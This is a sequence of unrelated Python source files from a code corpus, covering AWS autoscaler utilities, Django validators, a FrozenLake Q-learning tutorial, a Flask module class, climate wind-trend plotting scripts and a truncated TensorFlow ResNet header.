# re-index df (1, 2, 3...)
df_index =[]
for i in range(0, len(df)):
df_index.append(i+1)
df.index = (df_index)
| StarcoderdataPython |
1635995 | <reponame>benjamin-gar/clonesquad-ec2-pet-autoscaler
import os
import sys
import re
import hashlib
import json
import math
import gzip
# Hack: Force gzip to have a deterministic output (See https://stackoverflow.com/questions/264224/setting-the-gzip-timestamp-from-python/264303#264303)
class GzipFakeTime:
def time(self):
return 1.1
gzip.time = GzipFakeTime()
import base64
import boto3
from botocore.config import Config
from datetime import datetime
from datetime import timezone
from datetime import timedelta
import requests
from requests_file import FileAdapter
from collections import defaultdict
from iamauth import IAMAuth
import pdb
import debug as Dbg
from aws_xray_sdk.core import xray_recorder
from aws_xray_sdk.core import patch_all
patch_all()
def is_sam_local():
return "AWS_SAM_LOCAL" in os.environ and os.environ["AWS_SAM_LOCAL"] == "true"
import cslog
log = cslog.logger(__name__)
class Boto3ProxyClass(object):
""" boto3 proxy class.
Used for debugging purpose yet.
"""
_clients = {}
_responses = []
def __init__(self, client):
object.__setattr__( self, "_client", client)
@staticmethod
def client(cl, config=None):
if cl in Boto3ProxyClass._clients:
return Boto3ProxyClass._clients[cl]
Boto3ProxyClass._clients[cl] = Boto3ProxyClass(boto3.client(cl, config=config))
return Boto3ProxyClass._clients[cl]
def _proxy_call(self, fname, f, *args, **kwargs):
responses = object.__getattribute__(self, "_responses")
frame = {
"call": fname,
"args": args,
"kwargs": kwargs,
}
r = f(*args, **kwargs)
if fname.startswith("describe"):
frame["response"] = r
#responses.append(frame) # Uncomment this to record all describe API call responses
return r
def __getattribute__(self, name):
attr = getattr(object.__getattribute__(self, "_client"), name)
if hasattr(attr, '__call__'):
return lambda *args, **kwargs: object.__getattribute__(self, "_proxy_call")(name, attr, *args, **kwargs)
return attr
def __delattr__(self, name):
delattr(object.__getattribute__(self, "_client"), name)
def __setattr__(self, name, value):
setattr(object.__getattribute__(self, "_client"), name, value)
def __nonzero__(self):
return bool(object.__getattribute__(self, "_client"))
def __str__(self):
return str(object.__getattribute__(self, "_client"))
def __repr__(self):
return repr(object.__getattribute__(self, "_client"))
def __hash__(self):
return hash(object.__getattribute__(self, "_client"))
def is_direct_launch():
return len(sys.argv) > 1
def utc_now():
return datetime.now(tz=timezone.utc) # datetime.utcnow()
def epoch():
return seconds2utc(0)
def seconds_from_epoch_utc(now=None):
if now is None: now = utc_now()
return int((now - epoch()).total_seconds())
def seconds2utc(seconds):
return datetime.utcfromtimestamp(int(seconds)).replace(tzinfo=timezone.utc)
def str2utc(s, default=None):
if isinstance(s, datetime):
return s
try:
if s.endswith("Z"):
s = s[:-1] + "+00:00"
return datetime.fromisoformat(s)
except:
return default
return None
def sha256(s):
""" Return the SHA256 HEX digest related to the specified string.
"""
m = hashlib.sha256()
m.update(bytes(s,"utf-8"))
return m.hexdigest()
def abs_or_percent(value, default, max_value):
v = default
try:
if value.endswith("%") or value.endswith("p") or value.endswith("P"):
v = math.ceil(float(value[:-1])/100.0 * max_value)
else:
v = int(value)
except:
pass
return v
def str2duration_seconds(s, no_exception=False, default=None):
try:
return int(s)
except:
try:
# Parse timedelta metadata
meta = s.split(",")
metas = {}
for m in meta:
k, v = m.split("=")
metas[k] = float(v)
return timedelta(**metas).total_seconds()
except Exception as e:
if no_exception:
return default
raise e
def decode_json(value):
if value is None:
return None
if value.startswith("b'"):
value = value[2:][:-1]
try:
uncompress = gzip.decompress(base64.b64decode(value))
value = str(uncompress, "utf-8")
except:
pass
return json.loads(value)
def encode_json(value, compress=False):
value_j = json.dumps(value, sort_keys=True, default=str)
if compress:
compressed = gzip.compress(bytes(value_j, "utf-8"), compresslevel=9)
value_j = str(base64.b64encode(compressed), "utf-8")
return value_j
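def _example_json_roundtrip():
    """Hedged illustration (added): encode_json/decode_json round-trip with compression enabled."""
    payload = {"Hello": "World", "Count": 3}
    encoded = encode_json(payload, compress=True)    # base64-encoded gzip of the JSON string
    return decode_json(encoded) == payload           # True: the round trip preserves the data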
def Session():
s = requests.Session()
s.mount('file://', FileAdapter())
return s
def get_url(url, throw_exception_on_warning=False):
def _warning(msg):
if throw_exception_on_warning:
raise Exception(msg)
else:
log.warning(msg)
if url is None or url == "":
return None
# internal: protocol management
internal_str = "internal:"
if url.startswith(internal_str):
filename = url[len(internal_str):]
paths = [os.getcwd(), "/opt" ]
if "LAMBDA_TASK_ROOT" in os.environ:
paths.insert(0, os.environ["LAMBDA_TASK_ROOT"])
if "CLONESQUAD_DIR" in os.environ:
paths.append(os.environ["CLONESQUAD_DIR"])
paths.append("%s/src/resources/" % os.environ["CLONESQUAD_DIR"])
for path in paths:
for sub_path in [".", "custo", "resources" ]:
try:
f = open("%s/%s/%s" % (path, sub_path, filename), "rb")
except:
continue
return f.read()
_warning("Fail to read internal url '%s'!" % url)
return None
# s3:// protocol management
if url.startswith("s3://"):
m = re.search("^s3://([-.\w]+)/(.*)", url)
if len(m.groups()) != 2:
return None
bucket, key = [m.group(1), m.group(2)]
client = boto3.client("s3")
try:
response = client.get_object(Bucket=bucket, Key=key)
return response["Body"].read()
except Exception as e:
_warning("Failed to fetch S3 url '%s' : %s" % (url, e))
return None
# <other>:// protocols management
s = Session()
s.auth = IAMAuth()
try:
response = s.get(url)
except Exception as e:
_warning("Failed to fetch url '%s' : %s" % (url, e))
return None
if response is not None:
return response.content
return None
def put_s3_object(s3path, content):
""" s3path: Format must be s3://<bucketname>/<key>
"""
m = re.search("^s3://([-.\w]+)/(.*)", s3path)
if len(m.groups()) != 2:
return False
bucket, key = [m.group(1), m.group(2)]
key = "/".join([p for p in key.split("/") if p != ""]) # Remove extra '/'
client = boto3.client("s3")
try:
response = client.put_object(
Bucket=bucket,
Key=key,
Body=bytes(content, "utf-8"))
        return True
except:
return False
def parse_line_as_list_of_dict(string, with_leading_string=True, leading_keyname="_", default=None):
if string is None:
return default
def _remove_escapes(s):
return s.replace("\\;", ";").replace("\\,", ",").replace("\\=", "=")
try:
l = []
for d in re.split("(?<!\\\\);", string):
if d == "": continue
dct = defaultdict(str)
el = re.split("(?<!\\\\),", d)
idx_start = 0
if with_leading_string:
key = el[0]
if key == "": continue
dct[leading_keyname] = _remove_escapes(key) #.replace("\\,", ",")
idx_start = 1
for item in el[idx_start:]:
i_el = re.split("(?<!\\\\)=", item, maxsplit=1)
dct[i_el[0]] = _remove_escapes(i_el[1]) if len(i_el) > 1 else True
l.append(dct)
return l
except:
return default
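def _example_parse_line():
    """Hedged illustration (added): parse_line_as_list_of_dict on a made-up configuration string."""
    line = "ec2,InstanceId=i-0123,State=running;rds,DBName=mydb"
    # -> [{'_': 'ec2', 'InstanceId': 'i-0123', 'State': 'running'}, {'_': 'rds', 'DBName': 'mydb'}]
    return parse_line_as_list_of_dict(line)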
def dynamodb_table_scan(client, table_name, max_size=32*1024*1024):
xray_recorder.begin_subsegment("misc.dynamodb_table_scan")
items = []
items_size = []
size = 0
response = None
paginator = client.get_paginator('scan')
response_iterator = paginator.paginate(TableName=table_name, ConsistentRead=True)
for response in response_iterator:
if "Items" not in response: raise Exception("Failed to scan table '%s'!" % self.table_name)
# Flatten the structure to make it more useable
for i in response["Items"]:
item = {}
for k in i:
item[k] = i[k][list(i[k].keys())[0]]
if "Key" in item and "Value" in item:
items_size.append({"Key": item["Key"], "Size": len(item["Value"])})
# Do not manage expired records
if "ExpirationTime" in item:
expiration_time = int(item["ExpirationTime"])
if seconds_from_epoch_utc() > expiration_time:
continue
if max_size != -1:
item_size = 0
for k in item:
item_size += len(item[k])
if size + item_size > max_size:
break # Truncate too big DynamoDB table
else:
size += item_size
items.append(item)
log.log(log.NOTICE, f"DynamoDB: Table scan of '{table_name}' returned %d items (bytes={size})." % len(items))
if log.getEffectiveLevel() == log.DEBUG:
log.debug(f"Biggest items for table {table_name}:")
sorted_items = sorted(items_size, key=lambda item: item["Size"], reverse=True)
for i in sorted_items[:10]:
log.debug(f" Item: {i}")
xray_recorder.end_subsegment()
return items
@xray_recorder.capture()
def load_prerequisites(ctx, object_list):
for o in object_list:
xray_recorder.begin_subsegment("prereq:%s" % o)
log.debug(f"Loading prerequisite '{o}'...")
ctx[o].get_prerequisites()
xray_recorder.end_subsegment()
log.debug(f"End prerequisite loading...")
def initialize_clients(clients, ctx):
config = Config(
retries = {
'max_attempts': 5,
'mode': 'standard'
})
for c in clients:
k = "%s.client" % c
if k not in ctx:
log.debug("Initialize client '%s'." % c)
ctx[k] = boto3.client(c, config=config)
def discovery(ctx):
""" Returns a discovery JSON dict of essential environment variables
"""
context = ctx.copy()
for k in ctx.keys():
if (k.startswith("AWS_") or k.startswith("_AWS_") or k.startswith("LAMBDA") or
k.endswith("_SNSTopicArn") or
k in ["_HANDLER", "LD_LIBRARY_PATH", "LANG", "PATH", "TZ", "PYTHONPATH", "cwd", "FunctionName", "MainFunctionArn"] or
not isinstance(context[k], str)):
del context[k]
return json.loads(json.dumps(context, default=str))
| StarcoderdataPython |
3366125 | <reponame>abhinavtripathy/Volog
"""
File Name: Validators
Purpose: Functions for verifying that input is in an acceptable format.
Comments:
"""
from django.core.exceptions import ValidationError
from django.utils.timezone import now
def no_past_dates(date):
"""
This validator will raise a validation error if the passed in date is in the past.
:param date: Date Object being validated
:return: None
"""
if date < now().date():
raise ValidationError("Date cannot be in the past")
def no_future_dates(date):
"""
This validator will raise a validation error if the passed in date is in the future.
:param date: Date Object being validated
:return: None
"""
if date > now().date():
raise ValidationError("Date cannot be in the future")
def hour_instance_validator(hour):
"""
    This validator will raise a validation error if the passed hour is (1) negative, or (2) more than 12.
:param hour: hour integer
:return: None
"""
if hour < 0:
raise ValidationError("Hour submission cannot be negative")
elif hour > 12:
raise ValidationError("Your hour submission is too high. Please submit activities separately.")
def minutes_validator(minutes):
"""
This validator will raise a validation error if the passed minutes are (1) negative or (2) not rounded to the
nearest 5 minutes .
:param minutes: minutes integer
:return: None
"""
if minutes < 0:
raise ValidationError("Minutes cannot be negative.")
elif minutes % 5 != 0:
raise ValidationError("Please round your minutes to a multiple of 5.")
def student_id_validator(sid):
"""
    This validator will ensure that the provided id number is 7 digits long.
    Otherwise it raises a validation error.
:param sid: student id being tested
:return: None
"""
if len(str(sid)) != 7:
raise ValidationError("Student ID must be 7 digits long.")
| StarcoderdataPython |
56223 | <reponame>leedongminAI/Reinforcement_Basic<filename>RL_Lab_04_1.py
"""
Dummy Q-learning (table)
This code covers exploit & exploration and the discounted future reward.
"""
"""
We apply exploit & exploration and a discounted future reward because
in Lab 3 the agent does not move through the states in a random (flexible) way.
Visiting states we have not seen before may reveal better paths and increases efficiency,
so it is worth exploring unvisited states at least once.
Only two things need to be decided:
1. Select an action a -> exploit (use the values we currently have) & exploration (take a chance, try something new)
2. Receive immediate reward r -> discounted reward
# There are three ways to do exploit & exploration when selecting an action a:
# 'E-greedy', 'decaying E-greedy', and 'add random noise'.
# The code shown here uses add random noise; the E-greedy version is in RL_Lab_04_2.py.
For the basic code, please refer to RL_Lab_03_1.py.
"""
import gym
import numpy as np
import matplotlib.pyplot as plt
from gym.envs.registration import register
register(
id='FrozenLake-v3',
entry_point='gym.envs.toy_text:FrozenLakeEnv',
kwargs={'map_name': '4x4',
'is_slippery': False}
)
env = gym.make('FrozenLake-v3')
# Initialize table with all zeros
Q = np.zeros([env.observation_space.n, env.action_space.n])
# Discount factor
dis = 0.99
"""discounted reward를 설정해줍니다. 보통은 0.99 or 0.9로 합니다."""
num_episodes = 2000
# create lists to contain total rewards and steps per episode
rList = []
for i in range(num_episodes):
# Reset environment and get first new observation
state = env.reset()
rAll = 0
done = False
# The Q-Table learning algorithm
while not done:
"""
Choose an action by greedily (with noise) picking from Q table
        This is the add-random-noise E&E strategy."""
action = np.argmax(Q[state, :] + np.random.randn(1, env.action_space.n) / (i + 1))
# Get new state and reward from environment
new_state, reward, done, _ = env.step(action)
# Update Q-Table with new knowledge using decay rate
Q[state, action] = reward + dis * np.max(Q[new_state, :])
""" 여기서 discounted reward를 정했던 dis가 들어갑니다. """
rAll += reward
state = new_state
rList.append(rAll)
print("Success rate: " + str(sum(rList) / num_episodes))
print("Final Q-Table Values")
print(Q)
plt.bar(range(len(rList)), rList, color="blue")
plt.show()
| StarcoderdataPython |
1683632 | import argparse
def get_args():
parser = argparse.ArgumentParser()
# Data file
parser.add_argument('--train_file',
type=str,
default=None,
help='Training file')
parser.add_argument('--dev_file',
type=str,
default=None,
help='Development file')
parser.add_argument('--test_file',
type=str,
default=None,
help='test file')
parser.add_argument('--vocab_file',
type=str,
default="vocab.pkl",
help='dictionary file')
parser.add_argument('--vocab_size',
type=int,
default=50000,
help='maximum number of vocabulary')
parser.add_argument('--batch_size',
type=int,
default=64,
help='Batch size')
# Model details
parser.add_argument('--use_cuda',
type=int,
default=0,
help='use cuda GPU or not 0|1')
parser.add_argument('--model_file',
type=str,
default="model.th",
help='model file')
parser.add_argument('--model',
type=str,
default="HingeModelCriterion",
help='choose the loss criterion')
parser.add_argument('--embedding_size',
type=int,
default=300,
help='Default embedding size if embedding_file is not given')
parser.add_argument('--hidden_size',
type=int,
default=128,
help='Hidden size of RNN units')
parser.add_argument('--num_layers',
type=int,
default=1,
help='Number of RNN layers')
# training details
parser.add_argument('--num_epochs',
type=int,
default=10,
help='Number of epochs')
parser.add_argument('--eval_epoch',
type=int,
default=1,
help='Evaluation on dev set after K epochs')
parser.add_argument('--optimizer',
type=str,
default='Adam',
help='Optimizer: sgd or adam (default) or rmsprop')
parser.add_argument('--learning_rate', '-lr',
type=float,
default=0.1,
help='Learning rate for SGD')
return parser.parse_args()
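if __name__ == "__main__":
    # Hedged usage sketch (added): parse the defaults and print a few of them.
    args = get_args()
    print(args.batch_size, args.hidden_size, args.learning_rate)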
| StarcoderdataPython |
1745614 | # -*- coding: utf-8 -*-
"""
flask.module
~~~~~~~~~~~~
Implements a class that represents module blueprints.
:copyright: (c) 2011 by <NAME>.
:license: BSD, see LICENSE for more details.
"""
import os
from .blueprints import Blueprint
def blueprint_is_module(bp):
"""Used to figure out if something is actually a module"""
return isinstance(bp, Module)
class Module(Blueprint):
"""Deprecated module support. Until Flask 0.6 modules were a different
name of the concept now available as blueprints in Flask. They are
essentially doing the same but have some bad semantics for templates and
static files that were fixed with blueprints.
.. versionchanged:: 0.7
Modules were deprecated in favor for blueprints.
"""
def __init__(self, import_name, name=None, url_prefix=None,
static_path=None, subdomain=None):
if name is None:
assert '.' in import_name, 'name required if package name ' \
'does not point to a submodule'
name = import_name.rsplit('.', 1)[1]
Blueprint.__init__(self, name, import_name, url_prefix=url_prefix,
subdomain=subdomain, template_folder='templates')
if os.path.isdir(os.path.join(self.root_path, 'static')):
self._static_folder = 'static'
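# Hedged illustration (added): typical pre-0.7 usage of Module, kept as comments because the class
# is deprecated. Names below are illustrative; the route/registration details may differ by version.
#
#   from flask import Flask
#   admin = Module(__name__, name='admin', url_prefix='/admin')
#
#   @admin.route('/')
#   def index():
#       return 'Admin index'
#
#   app = Flask(__name__)
#   app.register_module(admin)   # older spelling; register_blueprint also accepts a Module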
| StarcoderdataPython |
1648791 | import warnings
import glob
import os
from scipy.stats import linregress, norm
import xarray as xr
import pandas as pd
import numpy as np
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=ImportWarning)
import cartopy.crs as ccrs
import cartopy.mpl.geoaxes
from utils import (
ensemble_mean_wind_speed,
annual_mean,
add_letters,
open_picontrol,
selbox,
open_datasets,
LONMAX,
LONMIN,
LATMIN,
LATMAX,
)
P_THRESHOLD = 5
def selHadISD(ds, path_to_data):
"""
averages over all station locations used in Zeng et al. (2019) from the HadISD dataset
:param ds:
:return:
"""
# load HadISD station list and limit to region of interest
station_list = pd.read_excel(
f"{path_to_data}/HadISD/Zeng_SIData2_HadISDv202.xlsx",
usecols=["lons", "lats"], sheet_name="stations"
)
station_list = station_list.where(
(station_list.lons < LONMAX)
& (station_list.lons > LONMIN)
& (station_list.lats > LATMIN)
& (station_list.lats < LATMAX)
).dropna()
# interpolate input data to HadISD stations and return the station mean
ds_stations = []
for index, row in station_list.iterrows():
ds_stations.append(ds.interp(lat=row["lats"], lon=row["lons"], method="linear"))
return xr.concat(ds_stations, dim="station_number").mean(dim="station_number")
def slope_if_significant(y, p_threshold=P_THRESHOLD, trend_length=20):
"""
Calculates the slope by fitting a linear trend of length trend_length to the timeseries y.
    If the slope is not statistically significant at the p-value provided
    as p_threshold, the function returns nan.
    :param y: input timeseries
    :param p_threshold: significance level in percent
    :param trend_length: length of the fitted trend in timesteps
    :return: trend slope, or nan if not significant
"""
p_threshold = p_threshold / 100 # from percentage to fraction
res = linregress(np.arange(trend_length) / 10, y)
if res[3] < p_threshold:
return res[0]
else:
return np.nan
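def _example_slope_if_significant():
    """Hedged illustration (added): slope_if_significant on a synthetic 20-year upward trend.

    The trend magnitude and noise level are arbitrary example values.
    """
    rng = np.random.default_rng(0)
    y = 0.05 * np.arange(20) / 10 + rng.normal(0, 0.01, 20)            # ~0.05 m/s/decade plus small noise
    return slope_if_significant(y, p_threshold=5, trend_length=20)     # slope if significant, else nan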
def calc_frac_partoftrend(y):
"""
    Computes the percentage of timesteps that are part of a 20-timestep trend period.
    :param y: array of trend slopes (nan where no significant trend starts)
    :return: percentage of years belonging to a trend period
"""
y = y.copy()
y[np.isfinite(y)] = 1 # all values are 1
y[np.isnan(y)] = 0
for i in range(y.size):
if y[i] == 1:
for j in range(1, 20):
try:
# if next timestep doesn't feature new trend increase weight
if y[i + j] == 0:
y[i] += 1
else:
break
except IndexError:
# add remaining years to 20y at the end of the timeseries
y[i] += 20 - j
break
return np.round(y.sum() / (y.size + 19) * 100)
def test_calc_frac_partoftrend():
# test frac_partoftrend
test_array = (
np.zeros(81) * np.nan
) # 81 year slope timeseries corresponds to 100y input data
test_array[3] = 3
assert calc_frac_partoftrend(test_array) == 20.0 / 100 * 100
test_array[-1] = 2
assert calc_frac_partoftrend(test_array) == 40.0 / 100 * 100
test_array[4] = 1
assert calc_frac_partoftrend(test_array) == 41.0 / 100 * 100
test_array[:] = 2
assert calc_frac_partoftrend(test_array) == 100.0
print("Test of function `calc_frac_partoftrend` completed succesfully")
def plot_histo(
slopes,
ax,
experiment,
full_output=False,
bins=50,
trend_length=20,
p_threshold=P_THRESHOLD,
):
"""
Plots histogram of wind speed trends that are significant at a given p value threshold
along with the observation-based estimates taken from earlier studies.
:param slopes:
:param ax:
:param experiment:
:param full_output:
:param bins:
:param trend_length:
:param p_threshold:
:return:
"""
n, bins, patches = ax.hist(
slopes[np.isfinite(slopes)],
bins=bins,
density=True,
color="darkorange",
alpha=0.7,
)
ax.set_xlim(xmin=-0.2, xmax=0.2)
textdic = {
"horizontalalignment": "center",
"verticalalignment": "center",
"rotation": 90,
"fontsize": 8,
}
ax.axvline(x=-0.09, color="purple", ls="--") # p.1, 2nd column, 1st paragraph
ax.text(-0.083, n.max() * 3.0 / 4, "Vautard et al. [2010] 1979 - 2008", textdic)
ax.axvline(x=-0.1, color="purple", ls="--") # from SI Fig. 4e
ax.text(-0.107, n.max() * 3.0 / 4, "Zeng et al. [2019] 1978 - 2003", textdic)
ax.axvline(x=0.11, color="purple", ls="--") # from SI Fig. 4e
ax.text(0.103, n.max() * 3.0 / 4, "Zeng et al. [2019] 2004 - 2017", textdic)
frac_partoftrend = calc_frac_partoftrend(slopes)
xlabel = f"Significant wind speed trends at {100 - p_threshold}% level [m/s/decade]"
ax.set_xlabel(xlabel, fontsize=12)
plot_title = f"{experiment}: {int(frac_partoftrend)}% of years belong to a {trend_length}y trend period"
ax.set_title(plot_title)
if full_output:
return n, bins, frac_partoftrend
else:
return bins
def plot_full_timeseries_with_trend_marks(path_to_data, path_to_plots):
"""
Plots annual and 20y running-mean wind speed timeseries during pre-industrial control.
Markers or red and blue color denote onsets of significant 20y trend periods.
A map of the considered domain is added.
:param path_to_data:
:param path_to_plots:
:return:
"""
# plot full timeseries and mark trends
ds_picontrol = open_picontrol(path_to_data)
slopes = np.asarray(
[
slope_if_significant(
ds_picontrol["sfcWind"][x : x + 20], p_threshold=P_THRESHOLD
)
for x in range(1980)
]
)
slopes_ts = xr.DataArray(
slopes, dims="time", coords={"time": ds_picontrol["sfcWind"].time[:1980]}
)
# plot slopes and mark trend onsets
f, ax = plt.subplots(figsize=(12, 5))
ds_picontrol["sfcWind"].plot(ax=ax, alpha=0.5, label="Annual mean")
ds_picontrol["sfcWind"].rolling(time=20, center=True).mean().dropna(
dim="time"
).plot(ax=ax, color="black", label="20y mean")
ds_picontrol["sfcWind"].where(slopes_ts > 0).plot.line(
marker="o", linewidth=0, color="red", alpha=0.7, label="onset upward trend"
)
ds_picontrol["sfcWind"].where(slopes_ts < 0).plot.line(
marker="o", linewidth=0, color="green", alpha=0.7, label="onset downward trend"
)
# add inset with map of focus region
axins = inset_axes(
ax,
width="10%",
height="20%",
loc="upper left",
axes_class=cartopy.mpl.geoaxes.GeoAxes,
axes_kwargs=dict(map_projection=ccrs.PlateCarree()),
)
axins.set_extent((LONMIN - 1, LONMAX + 1, LATMIN - 1.5, LATMAX + 0.5))
axins.add_feature(cartopy.feature.COASTLINE.with_scale("50m"), lw=0.2)
axins.add_feature(cartopy.feature.BORDERS.with_scale("50m"), lw=0.15)
axins.add_patch(
mpatches.Rectangle(
xy=[LONMIN, LATMIN],
width=LONMAX - LONMIN,
height=LATMAX - LATMIN,
facecolor="blue",
alpha=0.2,
transform=ccrs.PlateCarree(),
)
)
axins.outline_patch.set_visible(False)
ax.legend(loc="upper right", ncol=2)
ax.set_xlabel("Year of pi-control simulation", fontsize=12)
ax.set_ylabel("European mean wind speed [m/s]", fontsize=12)
ax.set_title("")
ax.set_ylim(ymax=5.42)
ax.set_xlim(xmin=ds_picontrol.time[0].values, xmax=ds_picontrol.time[-1].values)
plt.tight_layout()
plt.savefig(f"{path_to_plots}/timeseries_picontrol_Europe.jpeg", dpi=300)
plt.close("all")
def plot_trend_histograms(path_to_data, path_to_plots):
"""
Plots trend histograms for different combinations of
- trend lengths (15, 20, 25 years)
- aggregation types (box average or interpolated to HadISD station locations)
- significance levels (p values of 0.05, 0.1, 0.15, 1)
A Gaussian is fitted to those plots where no significance screening is applied (i.e. p=1)
:param path_to_data:
:param path_to_plots:
:return:
"""
ds_picontrol = open_picontrol(path_to_data)
ds_list_HadISD = [
selHadISD(annual_mean(xr.open_dataset(x, use_cftime=True)), path_to_data)
for x in sorted(glob.glob(f"{path_to_data}/pi-control/*.nc"))
] # use_cftime needed after 2200. Otherwise SerializationWarning is raised
ds_picontrol_HadISD = xr.concat(ds_list_HadISD, dim="time")
# PI-CONTROL plot trend histograms for different p-values
for trend_length in [15, 20, 25]:
# HadISD is sensitivity test with data averaged to European HadISD stations
for agg_type in ["HadISD", "box"]:
for p_threshold in [5, 10, 15, 100]:
if agg_type == "box":
ds_tmp = ds_picontrol.copy()
else:
ds_tmp = ds_picontrol_HadISD.copy()
slopes = np.asarray(
[
slope_if_significant(
ds_tmp["sfcWind"][x : x + trend_length],
p_threshold=p_threshold,
trend_length=trend_length,
)
for x in range(ds_tmp.time.size - trend_length)
]
)
f, ax = plt.subplots()
bins = plot_histo(
slopes,
ax,
"Pi-control",
trend_length=trend_length,
p_threshold=p_threshold,
)
# fit Gaussian to histogram without significance screening
if p_threshold == 100:
mu, std = norm.fit(slopes)
ax.plot(bins, norm.pdf(bins, mu, std), color="red")
ax.set_ylabel("MPI-GE PDF", fontsize=12)
add_letters(ax)
plt.tight_layout()
if agg_type == "box":
fig_path = f"{path_to_plots}/picontrol_wind_trends_Europe_{p_threshold}_{trend_length}y.jpeg"
else:
fig_path = f"{path_to_plots}/picontrol_HadISD_wind_trends_Europe_{p_threshold}_{trend_length}y.jpeg"
plt.savefig(fig_path, dpi=300)
plt.close("all")
def plot_pi_control_cmip6_trend_histograms(path_to_data, path_to_plots):
# PI-CONTROL trend histograms for CMIP6 ensemble
filelist = glob.glob(f"{path_to_data}/CMIP6_annual/*.nc")
models = np.unique([x.split("/")[-1].split("_")[2] for x in filelist])
CMIP6_histos = {}
CMIP6_bins = np.arange(-0.2, 0.2, 0.005)
for i, model in enumerate(models):
print(str(int(i / len(models) * 100)) + "%")
ds_list = [
selbox(xr.open_dataset(x, use_cftime=True))
for x in sorted(glob.glob(f"{path_to_data}/CMIP6_annual/*{model}*.nc"))
] # use_cftime needed after 2200. Otherwise SerializationWarning is raised
ds_CMIP6 = xr.concat(ds_list, dim="time")
slopes = np.asarray(
[
slope_if_significant(
ds_CMIP6["sfcWind"][x : x + 20], p_threshold=P_THRESHOLD
)
for x in range(ds_CMIP6.time.size - 20)
]
)
f, ax = plt.subplots()
CMIP6_histos[model] = plot_histo(
slopes,
ax,
"Pi-control " + model,
full_output=True,
bins=CMIP6_bins,
p_threshold=P_THRESHOLD,
)
ax.set_ylabel("PDF")
plt.tight_layout()
os.makedirs(f"{path_to_plots}/CMIP6", exist_ok=True)
fig_path = f"{path_to_plots}/CMIP6/{model}_picontrol_wind_trends_Europe_{P_THRESHOLD}.jpeg"
plt.savefig(fig_path, dpi=300)
plt.close("all")
# ensemble mean histo
del CMIP6_histos["EC-Earth3-CC"] # has no data
del CMIP6_histos["AWI-ESM-1-1-LR"] # only has negative trends of -0.07 m/s/dec
df_CMIP6 = pd.DataFrame(CMIP6_histos, index=["n", "bins", "fracoftrends"])
n_mean, frac_mean = df_CMIP6.loc["n"].mean(), df_CMIP6.loc["fracoftrends"].mean()
f, ax = plt.subplots()
ax.bar(CMIP6_bins[1:], n_mean, width=0.005, color="Darkorange", alpha=0.7)
textdic = {
"horizontalalignment": "center",
"verticalalignment": "center",
"rotation": 90,
"fontsize": 8,
}
ax.axvline(x=-0.09, color="purple", ls="--") # p.1, 2nd column, 1st paragraph
ax.text(
        -0.083, n_mean.max() * 3.0 / 4, "Vautard et al. [2010] 1979 - 2008", textdic
)
ax.axvline(x=-0.1, color="purple", ls="--") # from SI Fig. 4e
ax.text(-0.107, n_mean.max() * 3.0 / 4, "Zeng et al. [2019] 1978 - 2003", textdic)
ax.axvline(x=0.11, color="purple", ls="--") # from SI Fig. 4e
ax.text(0.103, n_mean.max() * 3.0 / 4, "Zeng et al. [2019] 2004 - 2017", textdic)
ax.set_ylabel("CMIP6 ensemble mean PDF", fontsize=12)
xlabel = f"Significant wind speed trends at {100 - P_THRESHOLD}% level [m/s/decade]"
ax.set_xlabel(xlabel, fontsize=12)
ax.set_title(f"Pi-control: {int(frac_mean)}% of years belong to a 20y trend period")
ax.set_xlim(xmin=-0.2, xmax=0.2)
add_letters(ax, letter_offset=1)
plt.tight_layout()
os.makedirs(f"{path_to_plots}/CMIP6", exist_ok=True)
fig_path = (
f"{path_to_plots}/CMIP6/Ensmean_picontrol_wind_trends_Europe_{P_THRESHOLD}.jpeg"
)
plt.savefig(fig_path, dpi=300)
plt.close("all")
def plot_experiment_trend_histograms(path_to_data, path_to_plots):
# trend histograms in other periods
for letter_index, experiment in enumerate(
["historical", "rcp26", "rcp45", "rcp85"]
):
print(experiment)
windfiles = sorted(glob.glob(f"{path_to_data}/{experiment}/sfcWind*.nc"))
ds = open_datasets(windfiles)
ds_ensmean = annual_mean(
selbox(ensemble_mean_wind_speed(path_to_data, experiment))
)
# Get internal variability as wind speed minus ensemble mean wind speed
ds_internal = ds - ds_ensmean
for p_threshold in [5, 100]:
# calculate trend slopes in individual ens members
slopes = []
for ens_member in ds_internal.ensemble_member:
da_internal = ds_internal["sfcWind"].sel(
{"ensemble_member": ens_member}
)
slopes.extend(
[
slope_if_significant(
da_internal[x : x + 20], p_threshold=p_threshold
)
for x in range(da_internal.size - 20)
]
)
slopes = np.asarray(slopes)
# calculate trend slopes in ensemble mean
slopes_ensmean = np.asarray(
[
slope_if_significant(
ds_ensmean["sfcWind"][x : x + 20], p_threshold=p_threshold
)
for x in range(ds_ensmean.time.size - 20)
]
)
# plotting
f, ax = plt.subplots()
ax2 = ax.twinx()
bins = plot_histo(slopes, ax, experiment, p_threshold=p_threshold)
ax2.hist(
slopes_ensmean[np.isfinite(slopes_ensmean)],
bins=50,
density=True,
color="darkgreen",
alpha=0.7,
label="ensemble mean",
)
ax.set_ylabel("PDF ensemble members", color="darkorange", fontsize=12)
ax2.set_ylabel("PDF ensemble mean", color="darkgreen", fontsize=12)
# fit Gaussian to histogram without significance screening
if p_threshold == 100:
mu, std = norm.fit(slopes)
ax.plot(bins, norm.pdf(bins, mu, std), color="red")
add_letters(ax, letter_offset=letter_index)
plt.tight_layout()
fig_path = f"{path_to_plots}/{experiment}_wind_trends_Europe_{p_threshold}_all.jpeg"
plt.savefig(fig_path, dpi=300)
plt.close("all") | StarcoderdataPython |
1694660 | <gh_stars>0
import os
import sys
#print(os.path.abspath('../../..'))
def tester():
"""
    Placeholder function; currently just returns 0.
"""
    return 0
| StarcoderdataPython |
1653462 | <reponame>bareblackfoot/faster-rcnn.selection<gh_stars>0
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by <NAME> and <NAME>
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.contrib.slim import losses
from tensorflow.contrib.slim import arg_scope
from tensorflow.contrib.slim.python.slim.nets import resnet_utils
from tensorflow.contrib.slim.python.slim.nets import resnet_v1
from tensorflow.contrib.slim.python.slim.nets.resnet_v1 import resnet_v1_block
import numpy as np
# from nets.network import Network
from model.config import cfg
def resnet_arg_scope(is_training=True,
batch_norm_decay=0.997,
batch_norm_epsilon=1e-5,
batch_norm_scale=True):
batch_norm_params = {
'is_training': False,
'decay': batch_norm_decay,
